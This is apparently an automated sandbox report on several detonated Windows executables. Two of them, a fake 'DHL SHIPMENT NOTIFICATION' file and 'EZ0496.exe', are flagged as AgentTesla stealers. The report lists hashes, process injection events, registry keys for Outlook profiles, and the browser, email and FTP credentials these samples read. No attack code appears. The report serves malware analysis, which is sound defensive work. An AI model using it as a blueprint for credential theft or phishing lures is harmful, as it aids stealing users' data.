memory/4328-17-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-16-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-18-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-15-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-14-0x00007FFAE39B0000-0x00007FFAE39C0000-memory.dmp

memory/4328-13-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-20-0x00007FFAE39B0000-0x00007FFAE39C0000-memory.dmp

memory/4328-19-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-12-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-9-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-22-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-23-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-21-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-8-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-7-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-2-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp

memory/4328-1-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp

memory/4328-47-0x00007FFB25A2D000-0x00007FFB25A2E000-memory.dmp

memory/4328-48-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-49-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 de643de789f31affa9257ebec8e9965e
SHA1 342b94a4511f76030be21621bbc0bf1129002eda
SHA256 02d7a3debe26df33a03ab55c4a9fa49befd762a4cd60780ba9717a1b670b97f7
SHA512 8b3ec35f1e261c7b36ccdd24220f0acb14072536b91d9a65ec002bf44018ed6cc7f51ea6c0caad27172ea44b6036a865baa62743ce82dd4bc8ea8531574984c8

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\systeminfo.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\systeminfo.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\systeminfo.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\systeminfo.exe

"C:\Users\Admin\AppData\Local\Temp\systeminfo.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 25.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\wecutil.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\wecutil.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\wecutil.exe

"C:\Users\Admin\AppData\Local\Temp\wecutil.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 106.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3056 set thread context of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 3056 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 71.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 71.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/3056-0-0x00000000750BE000-0x00000000750BF000-memory.dmp

memory/3056-1-0x00000000004F0000-0x00000000005DE000-memory.dmp

memory/3056-2-0x00000000053A0000-0x0000000005944000-memory.dmp

memory/3056-3-0x0000000004E90000-0x0000000004F22000-memory.dmp

memory/3056-5-0x00000000750B0000-0x0000000075860000-memory.dmp

memory/3056-4-0x0000000005030000-0x000000000503A000-memory.dmp

memory/3056-6-0x0000000005390000-0x00000000053A0000-memory.dmp

memory/3056-7-0x00000000750BE000-0x00000000750BF000-memory.dmp

memory/3056-8-0x00000000750B0000-0x0000000075860000-memory.dmp

memory/3056-9-0x00000000078A0000-0x000000000793C000-memory.dmp

memory/3056-10-0x0000000007940000-0x0000000007A0C000-memory.dmp

memory/3056-11-0x0000000007A30000-0x0000000007A7E000-memory.dmp

memory/3448-12-0x0000000000400000-0x000000000043C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL SHIPMENT NOTIFICATION 284748395PD.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

memory/3448-15-0x00000000750B0000-0x0000000075860000-memory.dmp

memory/3056-16-0x00000000750B0000-0x0000000075860000-memory.dmp

memory/3448-17-0x00000000750B0000-0x0000000075860000-memory.dmp

memory/3448-18-0x00000000056C0000-0x00000000056D8000-memory.dmp

memory/3448-19-0x00000000062C0000-0x0000000006326000-memory.dmp

memory/3448-20-0x00000000750B0000-0x0000000075860000-memory.dmp

memory/3448-21-0x00000000750B0000-0x0000000075860000-memory.dmp

memory/3448-22-0x00000000052D0000-0x0000000005320000-memory.dmp

memory/3448-23-0x00000000750B0000-0x0000000075860000-memory.dmp

memory/3448-24-0x00000000750B0000-0x0000000075860000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

128s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1812 set thread context of 764 N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

Network

N/A

Files

memory/1812-0-0x0000000074ACE000-0x0000000074ACF000-memory.dmp

memory/1812-1-0x0000000000D00000-0x0000000000DCA000-memory.dmp

memory/1812-2-0x0000000074AC0000-0x00000000751AE000-memory.dmp

memory/1812-3-0x0000000000200000-0x000000000020E000-memory.dmp

memory/1812-4-0x0000000074ACE000-0x0000000074ACF000-memory.dmp

memory/1812-5-0x0000000074AC0000-0x00000000751AE000-memory.dmp

memory/1812-6-0x00000000055B0000-0x000000000566C000-memory.dmp

memory/1812-7-0x00000000007F0000-0x000000000082C000-memory.dmp

memory/764-9-0x0000000000400000-0x000000000043C000-memory.dmp

memory/764-8-0x0000000000400000-0x000000000043C000-memory.dmp

memory/764-10-0x0000000000400000-0x000000000043C000-memory.dmp

memory/764-14-0x0000000000400000-0x000000000043C000-memory.dmp

memory/764-12-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/764-11-0x0000000000400000-0x000000000043C000-memory.dmp

memory/764-18-0x0000000000400000-0x000000000043C000-memory.dmp

memory/764-19-0x0000000074AC0000-0x00000000751AE000-memory.dmp

memory/764-16-0x0000000000400000-0x000000000043C000-memory.dmp

memory/1812-20-0x0000000074AC0000-0x00000000751AE000-memory.dmp

memory/764-21-0x0000000074AC0000-0x00000000751AE000-memory.dmp

memory/764-22-0x0000000074AC0000-0x00000000751AE000-memory.dmp

memory/764-23-0x0000000074AC0000-0x00000000751AE000-memory.dmp